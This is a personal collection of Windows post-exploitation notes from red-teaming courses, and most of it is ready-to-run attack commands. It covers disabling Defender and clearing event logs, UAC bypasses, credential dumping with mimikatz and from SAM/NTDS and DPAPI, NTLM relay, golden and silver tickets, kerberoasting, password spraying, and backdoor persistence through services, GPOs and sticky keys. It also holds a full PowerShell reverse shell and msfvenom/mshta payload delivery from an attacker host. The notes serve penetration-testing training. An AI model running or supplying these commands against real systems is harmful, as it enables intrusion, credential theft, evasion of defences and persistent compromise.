Last changed: 06.09.2021
Windows post exploitation
My notes taken during some pentesting and red teaming courses.
A nice collection of further red teaming procedures can be found on https://ired.team/.
login information
username
whoami
whoami /all
net user %username%
$env:USERNAME
logged in users
query user
quser
quser /server:<target>
record user behaviour
psr /start /gui 0 /output record.zip
psr /stop
system information
version and service pack info
ver
systeminfo
environment variables
set
gci env:
current time
date /t
time /t
hostname
hostname
net config workstation
reg query hklm\system\currentcontrolset\services\tcpip\parameters /v hostname
running processes
tasklist /V
tasklist /svc
taskkill /pid 1234
taskkill /im iexplore.exe
wmic process get caption,processid,parentprocessid,commandline
Get-Process -IncludeUserName | Select-Object Id,{$_.Parent.Id},UserName,Name
Stop-Process -Name evil.exe -Force
autostart
wmic startup get
open files
openfiles /local on
openfiles /query
event logs
wevtutil query-events Security /c:10 /f:text
wevtutil clear-log Security
powershell "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
installed software
wmic product get name,vendor,version
uninstall security update
wusa /uninstall /kb:1234567 /quiet /norestart
view group policies
gpresult /user victim /z > user_gpo.txt
gpresult /user victim /scope computer /z > computer_gpo.txt
nbtstat -n
nltest /dclist:target.domain
dir \\<DC>\SYSVOL\
robocopy /e \\<DC>\SYSVOL\<target.domain>\Policies .
get-gpo -all
get-gporeport "my gpo" -reporttype xml
edit group policies
dism.exe /online /get-capabilities | findstr /i grouppolicy
dism.exe /online /add-capability /capabilityname:Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
Get-Module -List -Name GroupPolicy
Install-WindowsFeature -Name GPMC
New-GPO -Name "Admin GPO" | New-GPLink -Target "OU=Computers,DC=target,DC=com"
Set-GPPrefRegistryValue -Name "Admin GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c /b /min \\srv1\share\backdoor.exe" -Type ExpandString
gpupdate /target:computer /force
shutdown /r /t 0
powershell
Get-History
Get-ChildItem env:
Get-Variable
find writable folders in $path
$f=$env:Path.split(";");$f[0..($f.length-2)] | % { get-acl $_} | fl Path,AccessToString
seatbelt
The tool seatbelt enumerates a lot of
the current system information automatically. But be aware that windows defender
will classifies seatbelt
as malicious.
user management
usernames and privileges
net user
net user /domain
[adsi]"WinNT://$env:userdomain/$env:username,user" | select *
net localgroup
net group /domain
net user Administrator new_password /active:yes
create new admin user
net user admin password /add
net localgroup administrators admin /add
uac bypass
reg add "hkcu\software\classes\mscfile\shell\open\command" /t REG_SZ /d "c:\windows\system32\cmd.exe /c whoami /priv > c:\bypass.txt" /f
eventvwr.exe
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f
sdclt.exe
windows defender
Recent versions of Windows make it quite hard to disable windows defender
.
disable
powershell.exe "get-service | ?{$_.name -match 'WpnUserService'} | stop-service"
powershell.exe Set-MpPreference -DisableRealtimeMonitoring 1
sc qc TrustedInstaller
sc stop TrustedInstaller
sc config TrustedInstaller binpath= "sc.exe stop WinDefend"
sc start TrustedInstaller
sc config TrustedInstaller binpath= "sc.exe config WinDefend start= disabled"
sc start TrustedInstaller
sc config TrustedInstaller binpath= "cmd.exe /c del /F /Q \"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe\""
sc start TrustedInstaller
sc config TrustedInstaller binpath= "sc.exe config SecurityHealthService start= disabled"
sc start TrustedInstaller
sc config TrustedInstaller binpath= C:\WINDOWS\servicing\TrustedInstaller.exe
powershell.exe "get-service | ?{$_.name -match 'WpnUserService'} | start-service"
An easy alternative is to add an exclusion for a specific folder. This should persist a reboot.
exclude folders
powershell.exe Add-MpPreference -ExclusionPath C:\Users\victim\, 'C:\Program Files\'
powershell.exe Get-MpPreference | fl ExclusionPath
powershell.exe Remove-MpPreference -ExclusionPath C:\Users\victim\, 'C:\Program Files\'
hash extraction
lsass process
wce.exe
wce.exe -d
lsass process (meterpreter)
run post/windows/gather/hashdump
lsass process (mimikatz)
To get a list of available modules enter ::
in mimikatz.
privilege::debug
sekurlsa::logonPasswords
token::whoami
token::elevate
lsadump::cache
lsadump::sam
sekurlsa::pth /user:Administrator /domain:. /ntlm:<admin-hash>
lsass core dump (mimikatz)
You can also create the dump using procdump
(admin privileges needed) or
comsvcsc.dll
(nt-system privileges needed)
C:\windows\system32\rundll32 C:\windows\system32\comsvcs.dll MiniDump <LSASS_PID> lsass.dmp full"
procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit
If lsass.exe is running as a Protected Process Light you can use PPLdump or try to disable PPL
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
registry
To dump hashes of local accounts from the registry pwdump and cachedump from creddump7 or secretsdump from Impacket can be used.
reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
pwdump SYSTEM SAM
cachedump SYSTEM SECURITY True
secretsdump.py -sam SAM -system SYSTEM -securty SECURITY LOCAL
user privileges
If you want to extract the hash of the current user without administrator privileges you can use inveigh and create a local http server which will dump the NetNTLMv2 authentication data. This should also work if you lure another user from inside the current network onto your host when using the hostname in the url.
powershell -ep bypass "import-module inveigh.ps1; invoke-inveigh -llmnr n -fileoutput y -fileoutputdirectory c:\users\public\"
"C:\Program Files\Internet Explorer\iexplore.exe" "http://localhost/"
stop-inveigh
get-inveigh -ntlmv2
ntlm relay
Inveigh contains the powershell
script inveigh-relay
to relay NetNTLM authentication.
ipmo Inveigh-Relay.ps1
invoke-inveighrelay -consoleoutput y -target srv2 -command "net localgroup administrators domain\user /add" -attack execute
An incoming connection will then be used to authenticate to the target machine to execute the given command.
On linux you can use ntlmrelayx
from Impacket.
The default action is to dump the local NT hashes.
python3 /usr/local/bin/ntlmrelayx.py -t smb://target -smb2support --no-http-server --no-wcf-server -c 'net localgroup administrators domain\user /add'
A method to provoke the NetNTLMv2 authentication is placing a .scf
file in a
shared folder and wait for anyone opening the folder with the windows explorer.
[Shell]
Command=2
IconFile=//10.0.0.1/test.ico
[Taskbar]
Command=ToggleDesktop
If you create a .lnk
file with powershell you could also use NetNTLMv2
authentication via http if you provide a hostname from the domain
$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("\\srv1\share\test.lnk")
$shortcut.IconLocation = "http://wkstn1/test.ico"
$shortcut.Save()
domain controller
To extract password hashes from an active directory you will need the file
ntds.dit
and the SYSTEM
registry hive from the domain controller.
The location of the ntds.dit
can be found in the registry.
reg query hklm\system\currentcontrolset\services\ntds\parameters
Impacket can extract the hashes in one step
secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL > hashes.txt
group policiy preferences
Sometimes you can find encrypted passwords in scheduled tasks configured via group policies
findstr /S /I cpassword \\<DC>\sysvol\<target.domain>\policies\*.xml
The cpassword
is encrypted with a well known 32-byte AES key
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
PowerSploit offers a script to search and decrypt these passwords.
Get-GPPassword.ps1 -Server <DC>
enable wdigest cleartext password storage
reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f
network configuration
network interfaces
ipconfig /all
netsh int ip set address "local area connection" static 10.0.0.11 255.255.255.0
modify routes
route print
route add 10.1.1.0 mask 255.255.255.0 192.168.11.3
domain controller
whoami
set logonserver
set userdnsdomain
set userdomain
nltest /dsgetdc:<DOMAIN>
nltest /dclist:<DoMAIN>
install powershell active directory module
dism.exe /online /get-capabilities | findstr /i rsat
dism.exe /online /add-capability /capabilityname:Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
Install-windowsfeature -name AD-Domain-Services -IncludeManagementTools
ipmo activedirectory
Get-ADDomain
Get-ADUser -Filter * | ft name,samaccountname,userprincipalname,enabled
Get-ADComputer -Filter * | ft dnshostname,enabled
adfind
adfind.exe -sc u:* -dn
adfind.exe -sc u:* > userlist.txt
adfind.exe -default -f "objectcategory=organizationalUnit" -dn
adfind.exe -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn
dns requests
nslookup hostname
for /L %i in (1,1,254) do nslookup "<IP-PREFIX>.%i" | findstr "Name:"
trace route
tracert host
open ports
netstat -nabo
enable IP forwarding
reg add hklm\system\currentcontrolset\services\remoteaccess /v Start /t REG_DWORD /d 2 /f
sc start remoteaccess
reg add hklm\system\currentcontrolset\services\tcpip\parameters /v IpEnableRouter /t REG_DWORD /d 1 /f
port forwarding
netsh in portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.99 connectport=80
netsh in portproxy delete v4tov4 listenport=8080 connectaddress=10.0.0.99 connectport=80
run cmd.exe as other user
runas /netonly /user:TARGET\user cmd.exe
ssh
Windows 10 newer then Version 1709 has a native ssh client
ssh -o StrictHostKeyChecking=no -R 3389:127.0.0.1:3389 user@whatever
firewall
netsh advfirewall firewall show rule name=all dir=in
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444
netsh advfirewall firewall delete rule name="Allow 4444"
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
remote wmi
Invoke-CimMethod -ComputerName <target> -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = 'notepad.exe';}
psexec
PsExec64.exe -accepteula \\dc1 -u Administrator -p SecretPassword123 cmd
PsExec64.exe -accepteula \\dc1 -s cmd
enable remote desktop
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall show rule name=all | find /i "remote" | find /i "desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
login (from linux)
xfreerdp /u:user /p:password /v:<target>
download file
certutil.exe -urlcache -split -f "http://1.2.3.4/tool.zip" t.zip
As certutil.exe
is known to be used by malicious actors you should prefer
powershell.
(New-Object Net.WebClient).DownloadString("http://1.2.3.4/")
(New-Object Net.WebClient).DownloadFile("http://1.2.3.4/tool.zip", "t.zip")
Expand-Archive t.zip .
In powershell > 3.0 you can use Invoke-WebRequest
.
(Invoke-WebRequest -UseBasicParsing -Uri http://1.2.3.4/).RawContent
Invoke-WebRequest -UseBasicParsing -Uri http://1.2.3.4/tool.exe -OutFile t.exe -Method POST -Body @{auth='password'}
Short version:
(iwr http://10.11.12.1/tool.exe).Content > t.exe
transfer file via clipboard
zip -qr - file | base64 | xclip -selection clipboard
[System.IO.File]::WriteAllBytes("file.zip", [System.Convert]::FromBase64String([IO.File]::ReadAllText("file.b64")))
expand-archive file.zip
tcp sockets with powershell
[IO.StreamReader]::new(([Net.Sockets.TcpClient]::new('1.2.3.4', 12345)).GetStream()).ReadLine() > file.txt
gc filename.zip -raw | % {$s=[IO.StreamWriter]::new(([Net.Sockets.TcpClient]::new('1.2.3.4', 12345)).GetStream());$s.Write($_);$s.Flush();$s.Dispose()}
file system
list disks
wmic logicaldisk get caption,description,volumename
wmic logicaldisk get caption,filesystem,freespace,name,size
searching
type file.txt | find /n /i "string"
dir /s /r | find ":$DATA"
forfiles /p c:\users /s /m *.exe /c "cmd /c echo @fdate @ftime @fsize @file"
attrib /S /D
powershell
(Get-ChildItem c:\ -Recurse -File *.zip).VersionInfo.FileName
Get-ChildItem c:\ -Recurse | Select-String "password" | Group Path | Select Name
Get-Content file.txt | Select-String -Pattern "^FAIL" -CaseSensitive
[io.file]::WriteAllBytes('sc32.bin',$sc32)
file acls
icacls file.txt
get-acl -path file.txt | fl
hexdump
certutil -encodehex c:\some\binary.exe hexdump.txt
Format-Hex c:\some\binary.exe
volume shadow copy
Windows Server allows invoking shadow copies via vssadmin
or wmic
.
vssadmin create shadow /for=c:
wmic shadowcopy call create volume=c:\
Then you can copy locked files from the shadow copy.
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM.bak
On workstations the access to GLOBALROOT
seems to be restricted. Here I use
the Extensible Storage Engine Utilities
esentutl /y /vss c:\windows\system32\config\SYSTEM /d c:\users\public\SYSTEM
A good alternative is RawCopy.
disable bitlocker
manage-bde -status
manage-bde -off c:
scheduled tasks
list tasks
schtasks.exe
create task
schtasks /create /tn test /sc once /st 13:37 /ru user2 /rp Pa$$w0rd /tr "cmd /c echo Hello > c:\users\user2\out.txt" /f
schtasks /run /tn test
schtasks /delete /tn test /f
services
list services
sc query
get-service | fl *
wmic service get name, startmode, state, startname, pathname
Get-WmiObject win32_service | ft name, startmode, state, startname, pathname
get-acl (Get-WmiObject win32_service | ?{$_.Name -like '*vuln*'} | select -expandproperty pathname).split(" ")[0]
create service
sc create new_service binpath= "cmd /c start /b c:\backdoor.exe" start=auto error=ignore
sc qc new_service
modify service
sc config new_service binpath= "cmd /c start /b c:\new_backdoor.exe"
sc start new_service
show service acls
sc.exe sdshow some_service | findstr ";" | ConvertFrom-SddlString | select -expandproperty discretionaryacl
Look for WriteData
in the permissions for NT AUTHORITY\Authenticated Users
.
More on can be found in the Microsoft Docs.
runas with powershell
powershell "$s=convertto-securestring 'Pa$$w0rd' -asplaintext -force;$c=new-object system.management.automation.pscredential('.\Administrator',$s);start-process cmd.exe -argumentlist '/c start /b c:\backdoor.exe' -credential $c"
windows network
netbios discovery (from linux)
nbtscan -v 192.168.11.0/24
nmblookup -A <target>
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script "smb-vuln*"
rpcclient -U "" 192.168.11.2
netbios discovery (from windows)
nbtstat -A <target>
net view <target> /all
rpcclient
rpcclient -U user 10.168.11.2
$> srvinfo
$> enumdomains
$> enumdomusers
server message block
smb file share
net share
net share test=c:\test
net use x: \\<target>\test
net use x: /delete
net share test /delete
mount share in linux
smbclient -L target -U '' -N
smbclient //target/share -U '' -N -c dir
smbclient //target/share -U '' -N -c 'cd docs; get secret.txt'
smbclient //target/share -U '' -N -c 'mkdir tmp; cd tmp; put evil.exe'
nmap --script smb-enum-shares share.wey-tech.com -p 445
mount -t cifs //<target>/test /mnt/cifs -o username=user
create smb server in linux
Impacket contains a simple smb server script.
python smbserver.py share /tmp/share
impacket-smbserver share /tmp/share
remote command execution
psexec -accepteula -u Administrator -p password //<target> <command>
winexe -U Administrator%password //<target> <command>
rpcclient -U Administrator <target>
extract NetNTMLv2 credentials from pcap
With NTLMssp-Extract you can
extract all captured NetNTLMv2 authentications in hashcat
or JohnTheRipper
compatible format.
ntlmssp_extract.py -f 0 -p smb.pcap
windows domain
join domain
Needs local administrator privileges and valid user credentials for the domain.
add-computer -domainname target -credential user_xy -restart
remove-computer -unjoindomaincredential user_xy -restart
join organisational unit
import-module .\powersploit\Recon\Recon.psm1
get-netdomaincontroller -domain target -credential user_xy
get-netou -domaincontroller dc1.target.com -credential user_xy -fulldata
add-computer -domainname target -oupath "OU=Domain Controllers,DC=target,DC=com" -newname dc2 -credential user_xy
restart-computer
pass the ticket
klist
klist tgt
klist purge
To export and reuse tickets in a Pass-The-Ticket
attack you can use mimikatz
cd %temp%
sekurlsa::tickets /export
kerberos::ptt [...]...-Administrator@krbtgt-target.com.kirbi
misc::cmd
If there is no TGT available maybe a service ticket can be found and reused for that specific service.
golden ticket
To acquire the hash of the krbtgt
service you will need domain administrator
privileges. With these you can copy the ntds.dit
(see above) or use mimikatz
lsadump::dcsync /domain:target.com /user:krbtgt
With this information anyone can create a TGT containing the SID of the domain
administrator (-500) and use it in a Pass-The-Ticket
attack.
kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH> /user:whatever
If a nonexistent username is chosen the TGT will become invalid after 20 minutes.
silver ticket
If you have the ntlm hash of a machine account you can create service tickets for the services running on the machine.
kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH /user:whatever /target:fileserver.target.com /service: cifs /ptt
misc::cmd
Machine account passwords can be extracted from the registry
lsadump.py SYSTEM SECURITY true
secretsdump.py -system SYSTEM -security SECURITY LOCAL
You will need the ntlm hash from the machine account plaintext password.
echo <PLAINTEXT_PASSWORD> | sed 's/../\\x&/g'
perl -e 'use Digest::MD4 "md4_hex"; print md4_hex("<ESCAPED_HEX_STRING>")."\n";'
kerberoasting
Sometimes services are not associated to a machine account but to a dedicated service logon account. If a weak password is setup for this service logon account it can be optained by cracking an encrypted service ticket. This can be done with user privileges.
setspn -T infected -Q */* | select-string -pattern "CN=User|CN=Managed" -context 0,1
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -argumentlist "IIS/server.target.com:80"
$TicketHexStream = [System.BitConverter]::ToString($Ticket.GetRequest()) -replace "-"
[System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
$Parts.RemoveAt($Parts.Count - 1)
$CipherText = $Parts -join "A48201"
$Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))"
$HashFormat = "`$krb5tgs`$23`$*IIS/server.target.com*`$$Hash"
The hash should have the format
$krb5tgs$<ETYPE>$*<ACCOUNT>$<DOMAIN>$<SPN>*$<HASH>
where everything between
the *
is optional. It can be cracked with hashcat
or john
hashcat -m 13100 hashfile wordlist --force
john --format=krb5tgs --wordlist=wordlist hashfile
Alternatviely you can run Invoke-Kerberoast.ps1
from the
EmpireProject to acquire the hash
in one go.
rubeus
Most of the attacks described above can also be done with the tool rubeus.
rubeus.exe triage /service:krbtgt
rubeus.exe dump /service:krbtgt /luid:0x1053 /nowrap
rubeus.exe ptt /ticket:<b64_ticket>
If you need the raw file you can use powershell
[System.IO.File]::WriteAllBytes("C:\users\user\desktop\TGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
microsoft exchange
mail sniper
MailSniper is a powershell module for pentesting Microsoft Exchange. The module can enumerate valid usernames by a timing attack.
ipmo MailSniper.ps1
Invoke-DomainHarvestOWA -ExchHostname exch.target.com
Invoke-UsernameHarvestOWA -ExchHostname exch.target.com -Domain TARGET -UserList usernames.txt -OutFile valid-users.txt
Invoke-PasswordSprayOWA -ExchHostname exch.target.com -UserList valid-users.txt -Password Password1
Get-GlobalAddressList -ExchHostname exch.target.com -UserName TARGET\username -Password Password1 -OutFile gal.txt
The domain name can also be retreived manually with curl
curl -s -ki https://exch.target.com/ews/exchange.asmx -H "Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==" | grep -o "NTLM .*" | cut -b 6- | base64 -d | strings -el
curl -s -ki https://exch.target.com/autodiscover/autodiscover.xml -H "Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==" | grep -o "NTLM .*" | cut -b 6- | base64 -d | strings -el
dpapi
The Windows Data Protection API (dpapi
) offers transparent methods for
encrypted storage of data. If you want to decrypt this data mimikatz can be used.
dpapi::protect /data:"testdata" /out:"blob.bin"
dpapi::blob /in:"blob.bin" /unprotect
The password used to protect a masterkey can be cracked.
attrib /S %appdata%\microsoft\protect\*
dpapi::blob /in:"blob.bin"
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>"
Hashcat supports encrypted masterkeys in the following format:
$DPAPImk$<VERSION>*<CONTEXT>*<SID>*<ENC_METHOD>*<HASH_ALG>*<ROUNDS>*<SALT>*<ENC_KEY_LEN>*<ENC_KEY>
VERSION: 1=des3+sha1; 2=aes256+sha512
CONTEXT: 1=local; 2=domain
ENC_METHOD: des3 || aes256
HASH_ALG: sha1 || sha512
ENC_KEY_LEN: 208 || 288
hashcat -m 15900 dpapi_mk_v2.hash wordlist -O
With the cracked password the masterkey and with it the dpapi blob can be decrypted.
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /password:<PASSWORD>
dpapi::blob /in:"blob.bin" /masterkey:<MASTERKEY>
The Windows Credential Manager uses Windows Vaults to store credentials for websites or network resources
vaultcmd.exe /list
vaultcmd.exe /listcreds:"Windows Credentials" /all
These can also be decrypted by mimikatz if it is running in the users context or if you know his password.
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /rpc
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /password:P@ssw0rd /protected
papi::cred /in:"%localappdata%\Microsoft\Credentials\<CREDENTIAL_FILE>" /masterkey:<MASTERKEY>
default browser
reg query hkcu\software\microsoft\windows\shell\associations\urlassociations\http\userchoice\ /v ProgId
recent files
dir %APPDATA%\Microsoft\Windows\Recent
parsing outlook mailbox
The libpst
package contains tools for converting outlook .pst
files
readpst -o extracted_mails mailbox.pst
persistent login bypass
sticky key
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
ease of access
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
backconnect shell
powershell
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()
metasploit hta_server
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f hta-psh > shell.hta
c:\\windows\\system32\\mshta.exe http://10.10.10.10/shell.hta
metasploit smb_delivery
c:\\windows\\system32\\rundll32.exe \\\\10.11.12.1\\share\\file_name.dll,0
Other methods can be found on hacktricks.xyz.
hiding file extension
cod.yrammusevitucnew.exe
‮cod.yrammusevituc‭new.exe
applocker bypass
msbuild.exe
c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe inline_task.csproj
html application
calc.hta
<html>
<head>
<title>Running calc.exe ...</title>
<script language="Javascript">
new ActiveXObject("WScript.Shell").run("c:/windows/sysnative/calc.exe", 1, false);
</script>
</head>
<body></body>
</html>
execute command with lnk file
$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("test.lnk")
$shortcut.targetpath ="c:\windows\system32\cmd.exe"
$shortcut.arguments = "/c powershell get-date -format 'dd-MMM-yyyy HH:mm:ss' >> %temp%\log.txt"
$shortcut.save()
unsafe DLL loading
procmon.exe (SysinternalsSuite)
Result is "NAME NOT FOUND" (-> Include)
Path ends with ".dll" (-> Include)
Path begins with "c:\windows" (-> Exclude)
Path begins with "c:\program" (-> Exclude)